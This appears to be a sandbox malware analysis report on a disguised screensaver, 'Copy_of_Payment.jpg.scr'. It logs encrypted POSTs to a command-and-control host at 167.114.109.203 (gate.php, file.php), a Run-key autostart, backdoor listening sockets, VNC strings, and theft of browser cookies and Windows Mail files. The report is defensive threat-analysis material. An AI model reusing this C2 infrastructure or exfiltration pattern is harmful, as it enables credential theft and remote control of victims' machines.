Source: explorer.exe, webhp[1].htm.1236.dr	String found in binary or memory: </script><div class="gb_Ja"><div class="gb_ha gb_ga gb_ta" aria-label="Google Apps" role="region" aria-hidden="true" tabindex="0"><ul class="gb_ja gb_aa" aria-dropeffect="move"><li class="gb_Z" aria-grabbed="false"><a class="gb_O" id="gb192" href="https://myaccount.google.com/?utm_source=OGB" data-pid="192" data-ved="0CAAQwS4oAA"><span class="gb_3" style="background-position:0 -276px"></span><span class="gb_4">Mein Konto</span></a></li><li class="gb_Z" aria-grabbed="false"><a class="gb_O" id="gb1" href="https://www.google.de/webhp?tab=ww&ei=6bJFVub4AcT-aMHzkdAM&ved=0CAEQqS4oAQ" data-pid="1"><span class="gb_3" style="background-position:0 -1035px"></span><span class="gb_4">Suche</span></a></li><li class="gb_Z" aria-grabbed="false"><a class="gb_O" id="gb8" href="https://maps.google.de/maps?hl=de&tab=wl" data-pid="8" data-ved="0CAIQwS4oAg"><span class="gb_3" style="background-position:0 -69px"></span><span class="gb_4">Maps</span></a></li><li class="gb_Z" aria-grabbed="false"><a class="gb_O" id="gb36"
Source: ubhiy.exe, dwm.exe, WinMail.exe, explorer.exe, taskhost.exe, cmd.exe, conhost.exe, HOSTNAME.EXE, tasklist.exe, ipconfig.exe, netsh.exe	String found in binary or memory: facebook.com equals www.facebook.com (Facebook)
Source: taskhost.exe	String found in binary or memory: http://connect.facebook.net/de_DE/all.js equals www.facebook.com (Facebook)
Source: taskhost.exe	String found in binary or memory: http://connect.facebook.net/de_DE/sdk.js equals www.facebook.com (Facebook)
Source: taskhost.exe	String found in binary or memory: http://platform.twitter.com/widgets/follow_button.html?show_screen_name=false&screen_name=msnde&show_count=false&lang=de equals www.twitter.com (Twitter)
Source: WinMail.exe, explorer.exe	String found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: WinMail.exe, explorer.exe	String found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: WinMail.exe, explorer.exe	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: explorer.exe	String found in binary or memory: yahoo.com equals www.yahoo.com (Yahoo)

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: ctldl.windowsupdate.com

Posts data to webserver

Show sources

Source: unknown

HTTP traffic detected: POST /service/omoba/helps/file.php HTTP/1.1 Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko Host: 167.114.109.203 Content-Length: 128 Connection: Keep-Alive Cache-Control: no-cache Data Raw: fe ab fb 4d cc 00 da cb cd ca 77 ec b1 bb 11 87 3b 98 2b 9c a2 a4 41 39 02 60 31 43 a5 a4 f4 cb 14 42 87 57 96 cc 68 03 79 42 4f 3d 41 2d a9 87 d3 ea 0a 3d 8e 7f c4 dd 2c 78 75 c0 95 92 87 8b 72 58 c3 61 b6 cf a6 c9 0b b4 17 81 10 be 92 3b e5 f3 26 41 f0 63 34 71 e1 32 db 0a 75 03 bd e0 83 73 f1 4a e5 dc 3f 27 f3 c3 9e 32 6c 99 68 b5 e6 48 57 d3 63 f4 48 52 cb 1d 64 5c 41 da 67 7c Data Ascii: Mw;+A9`1CBWhyBO=A-=,xurXa;&Ac4q2usJ?'2lhHWcHRd\Ag|

Tries to download non-existing http data (HTTP/1.1 404 Not Found)

Show sources

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 13 Nov 2015 09:52:09 GMT Server: Apache/2.4.3 (Unix) OpenSSL/1.0.1c PHP/5.4.7 X-Powered-By: PHP/5.4.7 Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html

Uses HTTPS

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 443

Uses a known web browser user agent for HTTP communication

Show sources

Source: global traffic	HTTP traffic detected: POST /service/omoba/helps/file.php HTTP/1.1 Accept: / User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko Host: 167.114.109.203 Content-Length: 128 Connection: Keep-Alive Cache-Control: no-cache Data Raw: fe ab fb 4d cc 00 da cb cd ca 77 ec b1 bb 11 87 3b 98 2b 9c a2 a4 41 39 02 60 31 43 a5 a4 f4 cb 14 42 87 57 96 cc 68 03 79 42 4f 3d 41 2d a9 87 d3 ea 0a 3d 8e 7f c4 dd 2c 78 75 c0 95 92 87 8b 72 58 c3 61 b6 cf a6 c9 0b b4 17 81 10 be 92 3b e5 f3 26 41 f0 63 34 71 e1 32 db 0a 75 03 bd e0 83 73 f1 4a e5 dc 3f 27 f3 c3 9e 32 6c 99 68 b5 e6 48 57 d3 63 f4 48 52 cb 1d 64 5c 41 da 67 7c Data Ascii: Mw;+A9`1CBWhyBO=A-=,xurXa;&Ac4q2usJ?'2lhHWcHRd\Ag\|
Source: global traffic	HTTP traffic detected: POST /service/omoba/helps/file.php HTTP/1.1 Accept: / User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko Host: 167.114.109.203 Content-Length: 122 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 03 b6 61 ec 39 cd 4d c7 b5 49 82 c2 e9 d7 ab de 44 e1 26 ad 69 6f 8a f2 c9 ab fa 88 6e 6f 3f 00 df 60 ad a6 7f 60 09 b8 9b 4c 80 77 86 fd f7 0e 5a 63 83 b4 07 f6 4d 54 a5 f1 fc 49 1c 1b 0e 02 fb d1 4a e8 3f 46 2f 40 82 3d 9e 08 99 37 1b b2 6c 7a af c8 79 ea bd f8 68 bb 52 83 fc 8a 34 69 0a fa 78 c3 6c 55 b6 ae 60 50 0d a1 e5 10 e1 3c 6f c7 c2 7f d0 49 bf a4 3e aa Data Ascii: a9MID&iono?``LwZcMTIJ?F/@=7lzyhR4ixlU`P<oI>
Source: global traffic	HTTP traffic detected: POST /service/omoba/helps/file.php HTTP/1.1 Accept: / User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko Host: 167.114.109.203 Content-Length: 128 Connection: Keep-Alive Cache-Control: no-cache Data Raw: fe ab fb 4d cc 00 da cb cd ca 77 ec b1 bb 11 87 3b 98 2b 9c a2 a4 41 39 02 60 31 43 a5 a4 f4 cb 14 42 87 57 96 cc 68 03 79 42 4f 3d 41 2d a9 87 d3 ea 0a 3d 8e 7f c4 dd 2c 78 75 c0 95 92 87 8b 72 58 c3 61 b6 cf a6 c9 0b b4 17 81 10 be 92 3b e5 f3 26 41 f0 63 34 71 e1 32 db 0a 75 03 bd e0 83 73 f1 4a e5 dc 3f 27 f3 c3 9e 32 6c 99 68 b5 e6 48 57 d3 63 f4 48 52 cb 1d 64 5c 41 da 67 7c Data Ascii: Mw;+A9`1CBWhyBO=A-=,xurXa;&Ac4q2usJ?'2lhHWcHRd\Ag\|
Source: global traffic	HTTP traffic detected: POST /service/omoba/helps/file.php HTTP/1.1 Accept: / User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko Host: 167.114.109.203 Content-Length: 128 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 0f 10 3f dc 35 9e 1d 97 d2 fb 01 df 03 ed b0 d3 ec c7 ff 55 6b 6d 88 f0 cb a9 f8 8a 6c 6d 3d 02 dd 8b 4e 9e 5f 05 a1 ca b0 8b 86 f4 88 e4 60 4e 1a 23 c3 f4 47 b6 0d 14 e5 b1 bc 09 5c 5b 4e 42 bb 91 0a a8 7f 06 6f 00 c2 7d de 48 d9 77 5b f2 2c 3a ef 88 39 aa fd b8 28 fb 12 c3 bc ca 74 29 4a ba 38 83 2c 15 f6 ee 3a 0a 57 fb a5 50 a1 7c 2f 81 9e 1a aa 3d 81 9b 02 d4 ad 95 88 13 ae b5 Data Ascii: ?5Ukmlm=N_`N#G\[NBo}Hw[,:9(t)J8,:WP\|/=
Source: global traffic	HTTP traffic detected: POST /service/omoba/helps/file.php HTTP/1.1 Accept: / User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko Host: 167.114.109.203 Content-Length: 128 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 0f 10 3f dc 35 9e 1d 97 d2 fb 01 df 03 ed b0 d3 ec c7 ff 55 6b 6d 88 f0 cb a9 f8 8a 6c 6d 3d 02 dd 8b 4e 9e 5f 05 a1 ca b0 8b 86 f4 88 e4 60 4e 1a 23 c3 f4 47 b6 0d 14 e5 b1 bc 09 5c 5b 4e 42 bb 91 0a a8 7f 06 6f 00 c2 7d de 48 d9 77 5b f2 2c 3a ef 88 39 aa fd b8 28 fb 12 c3 bc ca 74 29 4a ba 38 83 2c 15 f6 ee 3a 0a 57 fb a5 50 a1 7c 2f 81 9e 1a aa 3d 81 9b 02 d4 ad 95 88 13 ae b5 Data Ascii: ?5Ukmlm=N_`N#G\[NBo}Hw[,:9(t)J8,:WP\|/=
Source: global traffic	HTTP traffic detected: POST /service/omoba/helps/gate.php HTTP/1.1 Accept: / User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko Host: 167.114.109.203 Content-Length: 2064 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /webhp HTTP/1.1 Accept: / Connection: Close User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko Host: www.google.com Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /service/omoba/helps/gate.php HTTP/1.1 Accept: / User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko Host: 167.114.109.203 Content-Length: 3510 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /webhp?gfe_rd=cr&ei=5bJFVtXLKJDd8gfUoZv4CA HTTP/1.1 Accept: / Connection: Close User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: www.google.de
Source: global traffic	HTTP traffic detected: POST /service/omoba/helps/gate.php HTTP/1.1 Accept: / User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko Host: 167.114.109.203 Content-Length: 532 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 3b ba ee bd 0f 7c ca 99 2c d6 9d 4b 69 7e f6 79 39 4c 93 bb 11 15 f0 88 b3 d1 80 f2 18 19 49 76 7a 6b 60 0e 21 f6 5a 1a 34 c3 28 d6 0c d4 a7 1c 7c 45 a5 92 21 d0 6b 72 b4 e0 ed 58 3a 3d 28 24 a8 82 67 c4 11 1d 19 00 c3 7f ac 39 ad 02 5f 85 5e 31 e3 f6 49 a6 f0 a7 54 c1 1c 8f c0 f0 08 33 76 a1 23 b8 17 2e cd 96 63 15 7a e6 ec 2b e9 00 00 85 db 31 ce 00 ed a4 13 dc 8c e3 a3 0f e9 d3 c3 67 73 c2 0a 88 fb dd 00 1b 42 4d 31 fe 46 7d 43 3f cf ad 9a 1e 9c 1d 23 3a ac 0f 80 14 ec 80 c4 30 45 82 8f c3 64 a5 aa c3 f4 fd 73 61 fe 66 78 bc 50 03 d1 3c 73 79 fa e1 3c 0b af 06 9b 3b 26 3f 9e e8 08 cb d9 40 ca 34 da d6 a3 c3 54 47 fe 91 1a 8d 92 39 08 9b 7d 1f 2a 8a 85 94 18 ba db 31 1a 8e c5 7d 26 fa 23 11 56 f3 5c c1 a6 d9 dc 68 a1 19 23 b2 d2 32 55 8c b3 61 4b 3d aa 8d ef a5 ea a6 a7 7a 9d 49 40 f
Source: global traffic	HTTP traffic detected: POST /service/omoba/helps/gate.php HTTP/1.1 Accept: / User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko Host: 167.114.109.203 Content-Length: 532 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 1a ce 67 a7 9b 82 23 63 05 bd 06 eb 83 a2 ad 1d 2d 27 07 2e 84 80 65 1d 26 44 15 67 8d 8c dc e3 4d 7b de a1 51 06 e2 ba 84 69 99 b6 41 de 33 45 25 1c fc cb 78 89 32 2b ed b9 b4 01 63 64 71 7d f1 db 3e 9d 48 44 40 59 9a 26 f5 60 f4 5b 06 dc 07 68 ba af 10 ff a9 fe 0d 98 45 d6 99 a9 51 6a 2f f8 7a e1 4e 77 94 cf 3a 4c 23 bf b5 72 b0 59 59 dc 82 68 97 59 b4 fd 4a 85 d5 ba fa 56 b0 8a 9a 3e 2a 9b 53 d1 a2 84 59 42 1b 14 68 a7 1f 24 1a 66 96 f4 c3 47 c5 44 7a 63 f5 56 d9 4d b5 d9 9d 69 1c db d6 9a 3d fc f3 9a ad a4 2a 38 a7 3f 21 e5 09 5a 88 65 2a 20 a3 b8 65 52 f6 5f c2 62 7f 66 c7 b1 51 92 80 19 93 6d 83 8f fa 9a 0d 1e a7 c8 43 d4 cb 60 51 c2 24 46 73 d3 dc cd 41 e3 82 68 43 d7 9c 24 7f a3 7a 48 0f aa 05 98 ff 80 85 31 f8 40 7a eb 8b 6b 0c d5 ea 38 12 64 f3 d4 b6 fc b3 ff fe 23 c4 10 19 a
Source: global traffic	HTTP traffic detected: POST /service/omoba/helps/gate.php HTTP/1.1 Accept: / User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko Host: 167.114.109.203 Content-Length: 404 Connection: Keep-Alive Cache-Control: no-cache Data Raw: ba 59 b8 20 d1 0f 37 84 8f 70 fe 3c 05 7f 82 53 6e e2 1a 43 69 6e 8b f3 c8 aa fb 89 62 63 33 0c 8f bd a8 79 d9 bb c1 0a 47 2b 45 61 4e 5f 8d 22 42 7b 9b ac 1f ee 55 4c 8a de d3 66 04 03 16 1a 96 bc 59 fa 2f 23 27 3e fd 41 92 07 93 3c 61 bb 60 0f dd c8 77 98 ce 99 6a ff 22 b1 fe ce 36 0d 48 9f 1d 86 29 10 f3 a8 5d 2b 44 d8 d2 15 d7 3e 3e bb e5 0f f0 3e d3 9a 2d e2 b2 dd 9d 31 d7 ed fd 59 4d fc 34 b6 c5 e3 3e 25 7c 73 0f c0 78 43 7d 01 f1 93 a4 20 a2 23 1d 04 92 31 be 2a d2 be fa 0e 7b bc b1 fd 5a 9b 94 fd ca c3 4d 5f f1 69 77 b3 5f 0c de 33 7c 76 f5 ee 33 04 a0 09 28 3a 62 2d be c8 28 eb f9 60 ea 14 fa f6 83 e3 74 67 de b1 2b a2 bd 16 24 b7 51 33 06 a6 a9 b8 34 96 f7 1d 36 a2 e9 51 60 ea 69 0c 4c e9 46 db bc c3 c6 72 b9 01 3b aa c8 28 4f 96 bf 62 f9 92 1f 1f 60 0d 42 0e 0f d2 31 e5 ee 5

Found C&C like URL pattern

Show sources

Source: global traffic	HTTP traffic detected: POST /service/omoba/helps/gate.php HTTP/1.1 Accept: / User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko Host: 167.114.109.203 Content-Length: 2064 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /service/omoba/helps/gate.php HTTP/1.1 Accept: / User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko Host: 167.114.109.203 Content-Length: 3510 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /service/omoba/helps/gate.php HTTP/1.1 Accept: / User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko Host: 167.114.109.203 Content-Length: 532 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 3b ba ee bd 0f 7c ca 99 2c d6 9d 4b 69 7e f6 79 39 4c 93 bb 11 15 f0 88 b3 d1 80 f2 18 19 49 76 7a 6b 60 0e 21 f6 5a 1a 34 c3 28 d6 0c d4 a7 1c 7c 45 a5 92 21 d0 6b 72 b4 e0 ed 58 3a 3d 28 24 a8 82 67 c4 11 1d 19 00 c3 7f ac 39 ad 02 5f 85 5e 31 e3 f6 49 a6 f0 a7 54 c1 1c 8f c0 f0 08 33 76 a1 23 b8 17 2e cd 96 63 15 7a e6 ec 2b e9 00 00 85 db 31 ce 00 ed a4 13 dc 8c e3 a3 0f e9 d3 c3 67 73 c2 0a 88 fb dd 00 1b 42 4d 31 fe 46 7d 43 3f cf ad 9a 1e 9c 1d 23 3a ac 0f 80 14 ec 80 c4 30 45 82 8f c3 64 a5 aa c3 f4 fd 73 61 fe 66 78 bc 50 03 d1 3c 73 79 fa e1 3c 0b af 06 9b 3b 26 3f 9e e8 08 cb d9 40 ca 34 da d6 a3 c3 54 47 fe 91 1a 8d 92 39 08 9b 7d 1f 2a 8a 85 94 18 ba db 31 1a 8e c5 7d 26 fa 23 11 56 f3 5c c1 a6 d9 dc 68 a1 19 23 b2 d2 32 55 8c b3 61 4b 3d aa 8d ef a5 ea a6 a7 7a 9d 49 40 f
Source: global traffic	HTTP traffic detected: POST /service/omoba/helps/gate.php HTTP/1.1 Accept: / User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko Host: 167.114.109.203 Content-Length: 532 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 1a ce 67 a7 9b 82 23 63 05 bd 06 eb 83 a2 ad 1d 2d 27 07 2e 84 80 65 1d 26 44 15 67 8d 8c dc e3 4d 7b de a1 51 06 e2 ba 84 69 99 b6 41 de 33 45 25 1c fc cb 78 89 32 2b ed b9 b4 01 63 64 71 7d f1 db 3e 9d 48 44 40 59 9a 26 f5 60 f4 5b 06 dc 07 68 ba af 10 ff a9 fe 0d 98 45 d6 99 a9 51 6a 2f f8 7a e1 4e 77 94 cf 3a 4c 23 bf b5 72 b0 59 59 dc 82 68 97 59 b4 fd 4a 85 d5 ba fa 56 b0 8a 9a 3e 2a 9b 53 d1 a2 84 59 42 1b 14 68 a7 1f 24 1a 66 96 f4 c3 47 c5 44 7a 63 f5 56 d9 4d b5 d9 9d 69 1c db d6 9a 3d fc f3 9a ad a4 2a 38 a7 3f 21 e5 09 5a 88 65 2a 20 a3 b8 65 52 f6 5f c2 62 7f 66 c7 b1 51 92 80 19 93 6d 83 8f fa 9a 0d 1e a7 c8 43 d4 cb 60 51 c2 24 46 73 d3 dc cd 41 e3 82 68 43 d7 9c 24 7f a3 7a 48 0f aa 05 98 ff 80 85 31 f8 40 7a eb 8b 6b 0c d5 ea 38 12 64 f3 d4 b6 fc b3 ff fe 23 c4 10 19 a
Source: global traffic	HTTP traffic detected: POST /service/omoba/helps/gate.php HTTP/1.1 Accept: / User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko Host: 167.114.109.203 Content-Length: 404 Connection: Keep-Alive Cache-Control: no-cache Data Raw: ba 59 b8 20 d1 0f 37 84 8f 70 fe 3c 05 7f 82 53 6e e2 1a 43 69 6e 8b f3 c8 aa fb 89 62 63 33 0c 8f bd a8 79 d9 bb c1 0a 47 2b 45 61 4e 5f 8d 22 42 7b 9b ac 1f ee 55 4c 8a de d3 66 04 03 16 1a 96 bc 59 fa 2f 23 27 3e fd 41 92 07 93 3c 61 bb 60 0f dd c8 77 98 ce 99 6a ff 22 b1 fe ce 36 0d 48 9f 1d 86 29 10 f3 a8 5d 2b 44 d8 d2 15 d7 3e 3e bb e5 0f f0 3e d3 9a 2d e2 b2 dd 9d 31 d7 ed fd 59 4d fc 34 b6 c5 e3 3e 25 7c 73 0f c0 78 43 7d 01 f1 93 a4 20 a2 23 1d 04 92 31 be 2a d2 be fa 0e 7b bc b1 fd 5a 9b 94 fd ca c3 4d 5f f1 69 77 b3 5f 0c de 33 7c 76 f5 ee 33 04 a0 09 28 3a 62 2d be c8 28 eb f9 60 ea 14 fa f6 83 e3 74 67 de b1 2b a2 bd 16 24 b7 51 33 06 a6 a9 b8 34 96 f7 1d 36 a2 e9 51 60 ea 69 0c 4c e9 46 db bc c3 c6 72 b9 01 3b aa c8 28 4f 96 bf 62 f9 92 1f 1f 60 0d 42 0e 0f d2 31 e5 ee 5

Boot Survival:

Creates an autostart registry key

Show sources

Source: C:\Windows\System32\dwm.exe	Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run Teobyqzefo
Source: C:\Windows\System32\dwm.exe	Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run Teobyqzefo

Remote Access Functionality:

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Show sources

Source: C:\Copy_of_Payment.jpg.scr	Code function: 1_2_00430BB2 socket,bind,closesocket,
Source: C:\Copy_of_Payment.jpg.scr	Code function: 1_2_00430864 socket,bind,listen,closesocket,
Source: C:\Copy_of_Payment.jpg.scr	Code function: 1_1_00430BB2 socket,bind,closesocket,
Source: C:\Copy_of_Payment.jpg.scr	Code function: 1_1_00430864 socket,bind,listen,closesocket,
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Code function: 3_2_003F0864 socket,bind,listen,#3,
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Code function: 3_2_003F0BB2 socket,bind,#3,
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Code function: 3_2_00430BB2 socket,bind,closesocket,
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Code function: 3_2_00430864 socket,bind,listen,closesocket,
Source: C:\Windows\System32\dwm.exe	Code function: 4_2_00240BB2 socket,bind,#3,
Source: C:\Windows\System32\dwm.exe	Code function: 4_2_00240864 socket,bind,listen,#3,
Source: C:\Program Files\Windows Mail\WinMail.exe	Code function: 7_2_04880BB2 socket,bind,#3,
Source: C:\Program Files\Windows Mail\WinMail.exe	Code function: 7_2_04880864 socket,bind,listen,#3,
Source: C:\Windows\explorer.exe	Code function: 8_2_029D0864 socket,bind,listen,#3,
Source: C:\Windows\explorer.exe	Code function: 8_2_029D0BB2 socket,bind,#3,
Source: C:\Windows\System32\taskhost.exe	Code function: 10_2_01A70864 socket,bind,listen,#3,
Source: C:\Windows\System32\taskhost.exe	Code function: 10_2_01A70BB2 socket,bind,#3,
Source: C:\Windows\System32\cmd.exe	Code function: 12_2_00060BB2 socket,bind,#3,
Source: C:\Windows\System32\cmd.exe	Code function: 12_2_00060864 socket,bind,listen,#3,
Source: C:\Windows\System32\conhost.exe	Code function: 16_2_001D0864 socket,bind,listen,#3,
Source: C:\Windows\System32\conhost.exe	Code function: 16_2_001D0BB2 socket,bind,#3,
Source: C:\Windows\System32\HOSTNAME.EXE	Code function: 18_2_00060BB2 socket,bind,#3,
Source: C:\Windows\System32\HOSTNAME.EXE	Code function: 18_2_00060864 socket,bind,listen,#3,
Source: C:\Windows\System32\tasklist.exe	Code function: 19_2_00060BB2 socket,bind,#3,
Source: C:\Windows\System32\tasklist.exe	Code function: 19_2_00060864 socket,bind,listen,#3,
Source: C:\Windows\System32\ipconfig.exe	Code function: 20_2_00060BB2 socket,bind,#3,
Source: C:\Windows\System32\ipconfig.exe	Code function: 20_2_00060864 socket,bind,listen,#3,
Source: C:\Windows\System32\netsh.exe	Code function: 21_2_00170864 socket,bind,listen,#3,
Source: C:\Windows\System32\netsh.exe	Code function: 21_2_00170BB2 socket,bind,#3,

Contains VNC / remote desktop functionality (version string found)

Show sources

Source: Copy_of_Payment.jpg.scr	String found in binary or memory: RFB 003.003
Source: Copy_of_Payment.jpg.scr	String found in binary or memory: .datRFB 003.003
Source: Copy_of_Payment.jpg.scr	String found in binary or memory: RFB 003.003
Source: Copy_of_Payment.jpg.scr	String found in binary or memory: RFB 003.003
Source: Copy_of_Payment.jpg.scr	String found in binary or memory: .datRFB 003.003
Source: ubhiy.exe	String found in binary or memory: RFB 003.003
Source: ubhiy.exe	String found in binary or memory: .datRFB 003.003
Source: ubhiy.exe	String found in binary or memory: RFB 003.003
Source: ubhiy.exe	String found in binary or memory: RFB 003.003
Source: ubhiy.exe	String found in binary or memory: .datRFB 003.003
Source: dwm.exe	String found in binary or memory: RFB 003.003
Source: dwm.exe	String found in binary or memory: RFB 003.003
Source: dwm.exe	String found in binary or memory: .datRFB 003.003
Source: WinMail.exe	String found in binary or memory: RFB 003.003
Source: WinMail.exe	String found in binary or memory: RFB 003.003
Source: WinMail.exe	String found in binary or memory: .datRFB 003.003
Source: explorer.exe	String found in binary or memory: RFB 003.003
Source: explorer.exe	String found in binary or memory: RFB 003.003
Source: explorer.exe	String found in binary or memory: .datRFB 003.003
Source: taskhost.exe	String found in binary or memory: RFB 003.003
Source: taskhost.exe	String found in binary or memory: RFB 003.003
Source: taskhost.exe	String found in binary or memory: .datRFB 003.003
Source: cmd.exe	String found in binary or memory: RFB 003.003
Source: cmd.exe	String found in binary or memory: RFB 003.003
Source: cmd.exe	String found in binary or memory: .datRFB 003.003
Source: conhost.exe	String found in binary or memory: RFB 003.003
Source: conhost.exe	String found in binary or memory: RFB 003.003
Source: conhost.exe	String found in binary or memory: .datRFB 003.003
Source: HOSTNAME.EXE	String found in binary or memory: RFB 003.003
Source: HOSTNAME.EXE	String found in binary or memory: RFB 003.003
Source: HOSTNAME.EXE	String found in binary or memory: .datRFB 003.003
Source: tasklist.exe	String found in binary or memory: RFB 003.003
Source: tasklist.exe	String found in binary or memory: RFB 003.003
Source: tasklist.exe	String found in binary or memory: .datRFB 003.003
Source: ipconfig.exe	String found in binary or memory: RFB 003.003
Source: ipconfig.exe	String found in binary or memory: RFB 003.003
Source: ipconfig.exe	String found in binary or memory: .datRFB 003.003
Source: netsh.exe	String found in binary or memory: RFB 003.003
Source: netsh.exe	String found in binary or memory: RFB 003.003
Source: netsh.exe	String found in binary or memory: .datRFB 003.003

Stealing of Sensitive Information:

Steals Internet Explorer cookies

Show sources

Source: C:\Windows\System32\dwm.exe	File read: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@player.vimeo[2].txt
Source: C:\Windows\System32\dwm.exe	File read: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@jumpshot[2].txt
Source: C:\Windows\System32\dwm.exe	File read: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@oracle.112.2o7[1].txt
Source: C:\Windows\System32\dwm.exe	File read: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@adobe[3].txt
Source: C:\Windows\System32\dwm.exe	File read: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@msn[1].txt
Source: C:\Windows\System32\dwm.exe	File read: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@java[2].txt
Source: C:\Windows\System32\dwm.exe	File read: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@adobe[1].txt
Source: C:\Windows\System32\dwm.exe	File read: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@www.msn[2].txt
Source: C:\Windows\System32\dwm.exe	File read: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@127.0.0[2].txt
Source: C:\Windows\System32\dwm.exe	File read: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@ox-d.adobe[1].txt
Source: C:\Windows\System32\dwm.exe	File read: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@scorecardresearch[2].txt

Searches for Windows Mail specific files

Show sources

Source: C:\Windows\System32\dwm.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail *
Source: C:\Windows\System32\dwm.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail unknown
Source: C:\Windows\System32\dwm.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Backup *
Source: C:\Windows\System32\dwm.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Backup unknown
Source: C:\Windows\System32\dwm.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Backup\new *
Source: C:\Windows\System32\dwm.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Backup\new unknown
Source: C:\Windows\System32\dwm.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Stationery *
Source: C:\Windows\System32\dwm.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Stationery unknown
Source: C:\Program Files\Windows Mail\WinMail.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail edb<.log
Source: C:\Program Files\Windows Mail\WinMail.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail unknown
Source: C:\Program Files\Windows Mail\WinMail.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail edbres<.jrs
Source: C:\Program Files\Windows Mail\WinMail.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail edbres00001.jrs
Source: C:\Program Files\Windows Mail\WinMail.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail edbres00002.jrs
Source: C:\Program Files\Windows Mail\WinMail.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail tmp.edb
Source: C:\Program Files\Windows Mail\WinMail.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail WindowsMail.MSMessageStore
Source: C:\Program Files\Windows Mail\WinMail.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail *
Source: C:\Program Files\Windows Mail\WinMail.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail account<.oeaccount
Source: C:\Program Files\Windows Mail\WinMail.exe	Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail Backup
